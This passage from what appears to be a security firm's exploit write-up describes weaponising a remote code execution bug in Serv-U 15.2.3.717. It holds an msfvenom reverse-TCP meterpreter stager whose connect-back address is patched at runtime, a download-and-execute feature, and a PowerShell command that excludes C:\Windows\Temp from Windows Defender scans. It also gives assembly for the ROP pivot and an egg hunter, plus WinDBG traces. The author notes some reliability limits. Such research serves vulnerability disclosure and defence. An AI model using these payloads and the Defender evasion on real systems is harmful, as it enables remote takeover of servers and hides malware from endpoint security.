    At this point I have populated the registers and I just need to call VirtualProtect to make our shellcode executable:

    # Assuming we have address of VirtualProtect's trampoline in rax
    jmp [rax]

    And that's it! The part of the stack on which our shellcode resides is now executable.


    I took standard shellcode generated by msfvenom and patched it at exploit runtime to do my bidding. For example, consider the Metasploit-compatible shellcode stager. It's generated like so:

    [2021-10-19T18:47:49Z] root@h:/ehome/haggis# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=443 -f c
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x64 from the payload
    No encoder specified, outputting raw payload
    Payload size: 510 bytes
    Final size of c file: 2166 bytes
    unsigned char buf[] =

    The port and IP address to which the shellcode connects to download the second-stage shellcode are at these offsets:

    "PP"   # connect-back port       @ offs 244
    "HHHH" # connect-back IP address @ offs 246 

    My exploit simply patches in the IP:port specified on the command line at runtime. This makes it easy for the user/attacker to use arbitrary shellcode stagers / Sliver instances / Metasploit instances at runtime without having to generate new shellcode every time.
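The runtime patching described above can be sketched as follows. This is not the exploit's actual code: patch_stager is a hypothetical helper, the template is a dummy buffer rather than real shellcode, and the sketch assumes the port and address are stored in network byte order, as they would be in a sockaddr_in structure.

```python
import socket
import struct

PORT_OFFSET = 244   # offsets quoted in the text above
IP_OFFSET = 246


def patch_stager(shellcode, host, port):
    """Return a copy of the stager with the connect-back port and IPv4 address filled in."""
    patched = bytearray(shellcode)
    patched[PORT_OFFSET:PORT_OFFSET + 2] = struct.pack(">H", port)
    patched[IP_OFFSET:IP_OFFSET + 4] = socket.inet_aton(host)
    return bytes(patched)


# Dummy template standing in for the msfvenom output, with "PP"/"HHHH" placeholders.
template = bytearray(b"\x90" * 300)
template[PORT_OFFSET:PORT_OFFSET + 2] = b"PP"
template[IP_OFFSET:IP_OFFSET + 4] = b"HHHH"

patched = patch_stager(template, "192.0.2.10", 443)
print(patched[PORT_OFFSET:IP_OFFSET + 4].hex())
```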

    I used the same trick for the command exec shellcode, which simply tacks on the user-specified commands to the end of the shellcode:

    shellcode = (
    rop[offs_NOP_sled+offs_NOP_sled_padding+267:] = shellcode + cmd.encode() + b"\x00"

    Again, this saves the user generating new shellcode every time. Finally, I implemented a download + exec feature, which accepts a user-specified URL, downloads an executable from the URL to C:\Windows\Temp, then runs it. One little wrinkle I added is a PowerShell command to disable Windows Defender virus/malware scans from running in C:\Windows\Temp so you can run completely unobfuscated Sliver/Meterpreter payloads without getting tripped up by Microsoft endpoint security.

    The PowerShell command to do this is:

    powershell -Command "& {Add-MpPreference -ExclusionPath c:\windows\temp}"

    Without that command you'll find Windows Defender alerts on almost any payload you care to drop. Note: I don't recommend this for red team engagements because you'll still get caught by a zillion other controls. But for simple use cases, it's more than sufficient to pop a connect-back shell or Sliver session.

    I Almost Forgot About Unpivoting the Stack

    Sometimes it's necessary to return the stack pointer to whence it came so that the exploited process can resume execution and handle any errors/exceptions tidily. This exploit crashes Serv-U, but it automatically restarts. This is unacceptable in a lot of scenarios and making it not crash is left as an exercise for the reader.

    However, returning the stack to normal is an interesting problem because in ROP we don't usually save the stack pointer before pivoting to a different stack - the malicious ROP one. Getting it back generally involves querying the Thread Environment Block ("TEB") and Process Environment Block ("PEB") via the gs: segment register on 64-bit Intel/AMD Windows. These blocks are maintained by the operating system and provide thread-local storage for metadata about running threads.

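    On 64-bit Windows the gs segment base points at the TEB, and gs:[0x30] holds the TEB's own linear address (the NT_TIB Self pointer; the pointer to the PEB lives at gs:[0x60]). Offset 0x10 from the start of the TEB is StackLimit, the lowest address of the thread's stack, which makes a convenient place to start searching upwards. The following code can be used to read it:

    # recover the original stack
    mov rax, 0x30
    mov rax, qword gs:[rax]     # Read the TEB's own address (NT_TIB Self pointer) from gs:[0x30]
    add rax, 0x10               # Offset of StackLimit within the TEB
    mov rax, qword ptr [rax]    # Dereference [rax] to read the lowest address of the thread's stack
    mov rdi, rax                # Store that address in rdi as the starting point for the search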
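
    The offsets used above (0x30, then 0x10) can be checked against the NT_TIB64 structure from winnt.h, which sits at the very start of the 64-bit TEB. The following is a minimal sketch that models that header with ctypes purely to print field offsets; it does not read any live process memory, and the class is a hand-written model rather than an import from a Windows library.

```python
import ctypes


class NT_TIB64(ctypes.Structure):
    """Model of the NT_TIB64 header (winnt.h) at the start of the x64 TEB."""
    _fields_ = [
        ("ExceptionList", ctypes.c_uint64),
        ("StackBase", ctypes.c_uint64),    # highest address of the stack
        ("StackLimit", ctypes.c_uint64),   # lowest address of the stack
        ("SubSystemTib", ctypes.c_uint64),
        ("FiberData", ctypes.c_uint64),
        ("ArbitraryUserPointer", ctypes.c_uint64),
        ("Self", ctypes.c_uint64),         # linear address of the TEB itself
    ]


offsets = {name: getattr(NT_TIB64, name).offset for name, _ in NT_TIB64._fields_}
for name, off in offsets.items():
    print(f"{name:22s} +0x{off:02x}")
```

    In this model, Self sits at +0x30 and StackLimit at +0x10, which are the two offsets the assembly uses.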

    In order to return rsp to the same address it contained at the very beginning of the exploit - at the point when call r9 first occurred - I need to find the precise address of the top of the old stack frame. This turns out to be easy because the stack frame contains return addresses in Serv-U.dll, which as we saw earlier does not support ASLR.

    As a result, I can simply look at a stack trace taken at the point call r9 is executed and make note of the addresses there. For example, consider this stack trace taken from exactly the scenario just described:

    0:013> k
     # Child-SP          RetAddr               Call Site
    00 0000009d`d2aff320 00000000`72111cb8     LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
    01 0000009d`d2aff380 00000000`7218f41b     LIBEAY32!EVP_rc4_40+0x488
    02 0000009d`d2aff3d0 00000000`7210efaa     LIBEAY32!FINGERPRINT_premain+0x291b
    03 0000009d`d2aff410 00000001`8016086c     LIBEAY32!EVP_EncryptUpdate+0xda
    04 0000009d`d2aff460 00000001`80141795     Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c
    05 0000009d`d2aff4a0 00000001`80141263     Serv_U!CUPnPNotifyEvent::SetTimeout+0x3aa5
    06 0000009d`d2aff4e0 00000001`80144fb0     Serv_U!CUPnPNotifyEvent::SetTimeout+0x3573
    07 0000009d`d2aff580 00000200`577f8dd7     Serv_U!CUPnPNotifyEvent::SetTimeout+0x72c0
    08 0000009d`d2aff650 00000200`577f8c5c     RhinoNET!CRhinoSocket::ProcessReceiveBuffer+0x33
    09 0000009d`d2aff690 00000200`577f6c4e     RhinoNET!CRhinoSocket::OnReceive+0x170
    0a 0000009d`d2aff6e0 00000200`577f32eb     RhinoNET!CRhinoProductSocket::OnReceive+0x3e
    0b 0000009d`d2aff710 00000200`577f356b     RhinoNET!CAsyncSocketX::DoCallBack+0x107
    0c 0000009d`d2aff740 00000200`577f350f     RhinoNET!CAsyncSocketX::ProcessAuxQueue+0x53
    0d 0000009d`d2aff770 00007fff`5ffda399     RhinoNET!CSocketWndX::OnSocketNotify+0x13
    0e 0000009d`d2aff7a0 00007fff`5ffd97af     mfc140u!CWnd::OnWndMsg+0xba9 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 2698] 
    0f 0000009d`d2aff920 00007fff`5ffd7093     mfc140u!CWnd::WindowProc+0x3f [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 2099] 
    10 0000009d`d2aff960 00007fff`5ffd7464     mfc140u!AfxCallWndProc+0x123 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 265]
    11 0000009d`d2affa50 00007fff`5fe7a509     mfc140u!AfxWndProc+0x54 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 417]
    12 0000009d`d2affa90 00007fff`90c60089     mfc140u!AfxWndProcBase+0x49 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\afxstate.cpp @ 299]
    13 0000009d`d2affad0 00007fff`90c5fa02     USER32!UserCallWinProcCheckWow+0x319
    14 0000009d`d2affc60 00000001`8016ea75     USER32!DispatchMessageWorker+0x1d2
    15 0000009d`d2affce0 00000001`8016eaed     Serv_U!CUPnPNotifyEvent::SetTimeout+0x30d85
    16 0000009d`d2affd50 00007fff`8ee36b4c     Serv_U!CUPnPNotifyEvent::SetTimeout+0x30dfd
    17 0000009d`d2affd80 00007fff`90954ed0     ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x4c
    18 0000009d`d2affdb0 00007fff`9124e20b     KERNEL32!BaseThreadInitThunk+0x10
    19 0000009d`d2affde0 00000000`00000000     ntdll!RtlUserThreadStart+0x2b

    The first Serv-U stack frame is at index #4 and contains the saved return address for the instruction at:

    Serv_U!CUPnPNotifyEvent::SetTimeout + 0x22b7c:
    04 0000009d`d2aff460 00000001`80141795     Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c

    The return address is 0x180141795 and always will be, due to the absence of ASLR. Therefore, to find the original stack I just hunt for 0x80141795 (the low 32 bits of the 64-bit address 0x0000000180141795), starting at the stack address I read via gs: above. I built the following egg hunter:

    # Egg hunter for the value 0x80141795, starting at the stack address read via gs: above.
    # No egg-not-found error handling because if this code is running then the 
    # stack frame we're looking for is guaranteed to exist.
    mov eax, 0x80141795           # low 32 bits of the saved return address we want to find
    mov rcx, 0x4000               # maximum number of dwords to compare
    cld                           # clear DF so rdi advances towards higher addresses
    repne scasd eax, dword [rdi]  # scan for the egg starting @ [rdi]
    mov rax, rdi                  # save the found stack address in rax    
    mov rdx, 0x140                # the top of the original stack frame is...
    sub rax, rdx                  # ...0x140 bytes upwards
    mov rsp, rax                  # pivot to the new (old!) stack
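
    To make the scan semantics concrete, here is a rough Python emulation of repne scasd over a byte buffer. The function name scasd_hunt and the fake stack contents are illustrative assumptions, not part of the exploit. Two details are worth noting: rcx counts dword comparisons rather than bytes, and scasd advances rdi after every comparison, so on a match rdi points 4 bytes past the egg.

```python
import struct

RET_ADDR = 0x0000000180141795
EGG = RET_ADDR & 0xFFFFFFFF  # low 32 bits: 0x80141795


def scasd_hunt(mem: bytes, start: int, egg: int, max_dwords: int):
    """Emulate `repne scasd` with DF clear.

    Returns (match_offset, rdi_after) on a hit, or None if the count
    runs out or the buffer ends first.
    """
    needle = struct.pack("<I", egg)  # little-endian dword, as stored in memory
    rdi, rcx = start, max_dwords
    while rcx > 0 and rdi + 4 <= len(mem):
        dword = mem[rdi:rdi + 4]
        rdi += 4   # scasd always advances rdi after the compare
        rcx -= 1
        if dword == needle:
            return rdi - 4, rdi
    return None


# Fake stack: 24 bytes of zeros, the saved return address, then 8 more bytes
fake_stack = bytes(24) + struct.pack("<Q", RET_ADDR) + bytes(8)
hit = scasd_hunt(fake_stack, 0, EGG, 0x4000)
```

    Matching only the low dword keeps the hunter short, at the cost that any other dword-aligned occurrence of the same 4 bytes earlier in the scanned range would be found first.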

    You'll notice that some math is being done to subtract 0x140 from rax before writing it to rsp. This is to account for the fact that our egg - the saved return address - was not at the top of the stack frame list. In fact, it was index #4 and I need rsp to point at the frame index #0:

    # Child-SP           RetAddr               Call Site
    00 0000009d`d2aff320 00000000`72111cb8     LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
    04 0000009d`d2aff460 00000001`80141795     Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c

    The offset on the stack between #4 and #0 is 0x9dd2aff460 - 0x9dd2aff320 = 0x140 so I subtract that amount from rax before setting the stack pointer, rsp.
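
    The same subtraction can be reproduced directly from the Child-SP column of the WinDBG output. This is just a small convenience sketch; parse_windbg_addr is a hypothetical helper name that strips the backtick WinDBG puts in the middle of 64-bit addresses.

```python
def parse_windbg_addr(text: str) -> int:
    """Convert a WinDBG-style 64-bit address such as 0000009d`d2aff320 to an int."""
    return int(text.replace("`", ""), 16)


frame0_sp = parse_windbg_addr("0000009d`d2aff320")  # Child-SP of frame #0
frame4_sp = parse_windbg_addr("0000009d`d2aff460")  # Child-SP of frame #4
delta = frame4_sp - frame0_sp
print(hex(delta))  # 0x140
```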

    One of the beautiful things about Radare2 is its ability to turn code into opcodes for shellcode. So the egg hunter above becomes:

    % cat /tmp/s.asm
    mov eax, 0x80141795
    mov rcx, 0x4000
    repne scasd eax, dword [rdi]
    mov rax, rdi
    mov rdx, 0x140
    sub rax, rdx
    mov rsp, rax
    % cat /tmp/s.asm | rasm2 -a x86 -b 64 -

    Simple and elegant.

    Lastly, I could return most of the registers to their pre-exploit values before returning control of execution to the old stack; doing so is left as an exercise for the reader.

    In Summary

    This was a fun exploit, and I got lucky a few times! The fact that ASLR was disabled on Serv-U.dll was crazy lucky and saved a lot of hassle.

    Other mitigations, such as Control Flow Guard ("CFG"), were also disabled. This again made it easy to write an exploit without having to work around restricted access to critical functions, such as GetProcAddress().

    It's worth pointing out that the method I use to calculate the address of the ROP stack can, on occasion, generate an address that isn't 16-byte aligned. As a result, when GetProcAddress() reaches a MOVAPS instruction (which requires its memory operand to be 16-byte aligned) the exploit crashes. To make the exploit more reliable, the solution is to force the ROP stack to be located at an aligned address; this would require some wrangling and is left as an exercise for the reader.
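
    As a small illustration of the alignment issue, the check and the usual round-down fix look like this in Python. The helper names and the sample address are made up for the example; how the aligned value would be fed back into the ROP chain is not shown and remains the exercise described above.

```python
def is_aligned(addr: int, alignment: int = 16) -> bool:
    """True if addr is a multiple of alignment (MOVAPS needs 16 bytes)."""
    return addr % alignment == 0


def align_down(addr: int, alignment: int = 16) -> int:
    """Round addr down to the nearest multiple of a power-of-two alignment."""
    return addr & ~(alignment - 1)


candidate = 0x9dd2aff328          # hypothetical ROP stack address, 8 bytes off
aligned = align_down(candidate)   # 0x9dd2aff320
print(hex(candidate), is_aligned(candidate), hex(aligned), is_aligned(aligned))
```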

    It should also be pointed out that the exploit is currently hard-coded for the Serv-U version targeted here (v15.2.3.717). To build against other Serv-U versions would require a little work to recalculate the ROP gadget addresses in Serv-U.dll. Hopefully, we'd find the same gadgets in the other versions of Serv-U, but I haven't looked yet.

    Let us know what you think; you can connect with us on social media and follow us on GitHub for more exploits!

    For more information on our continuous offensive security platform, you can get in touch with us via the Cosmos page.


    Carl Livitt

    About the author, Carl Livitt

    Bishop Fox Alumnus

    Carl Livitt is a Bishop Fox alumnus. He was a Principal Researcher at Bishop Fox with decades of experience in mobile and application security, hardware and embedded devices, reverse engineering, and global-scale penetration testing.

    Carl is credited with the discovery of many vulnerabilities within both commercial and open-source software. He was brought in as a third-party expert to lead the team that confirmed several security issues with St. Jude Medical implantable devices. His work eventually led to an official communication from the FDA.

    Carl has served as a contributing author to Hacking Exposed Web Applications 3rd Edition as well as a technical advisor for Network Security Assessment 1st Edition. He has been interviewed on NPR and quoted in publications including USA Today and eWeek. Carl co-authored the iOS reverse engineering framework iSpy, which was featured at Black Hat USA's Tools Arsenal.
